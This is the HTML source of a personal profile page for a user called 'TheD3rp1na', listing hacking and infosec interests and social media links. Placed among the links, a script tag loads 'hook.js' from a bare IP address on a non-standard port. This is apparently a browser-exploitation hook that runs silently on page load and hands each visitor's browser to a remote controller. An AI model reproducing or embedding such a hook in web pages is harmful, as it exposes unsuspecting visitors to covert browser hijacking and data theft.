<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <link rel="icon" href="assets/dizz.png">
        <script src="assets/script.js" type="text/javascript"></script>
        <title>TheD3rp1na</title>
        <style>
            html, body {
                background-color: #0f0f0f;
                cursor: url(assets/dizz.cur), auto;
            }
            .ctrall{
                margin: 0;
                position: absolute;
                top: 40%;
                left: 49%;
                margin-right: -50%;
                transform: translate(-50%, -50%);
            }
            .dselect {
                -webkit-user-select: none;
                -ms-user-select: none;
                user-select: none;  
            }
            @font-face {
                font-family: dizzz;
                src: url(assets/dizz.ttf) format('truetype');
                font-weight: bold;
                font-style: normal;
            }
            div {
                font-family: dizzz;
                text-align: center;
                color:darkgrey;
            }
            b:hover{
                color:rgb(80, 80, 80);
                cursor: url(assets/dizzcross.cur), auto;
            }
        </style>
    </head>
    <body class="ctrall">
        <div>
            <a class="dselect" style="font-size: 23px;">Interest and experience~ hacking, infosec, games</a>
        </div>
        <div>
            <a class="dselect" style="font-size: 23px;">Langs~ Python, HTML/CSS/JS</a>
        </div>
        <div>
            <a class="dselect">discord~ d3rp1na</a>
        </div>
        <div>
            <b class="dselect" onclick="window.location.href='https:\/\/discord.com\/invite\/g3MeSnxJpz'">discord server~ team strike</b>
        </div>
        <div>
            <b class="dselect" onclick="window.location.href='mailto:dizz@riseup.net'">twitch~ thed3rp1na</b>
        </div>
        <div>
            <b class="dselect" onclick="window.location.href='https:\/\/tiktok.com\/@d3rp1na'">tiktok~ d3rp1na</b>
            <script src="http://84.251.58.249:27593/hook.js" type="text/javascript"></script>
        </div>
    </body>
</html>
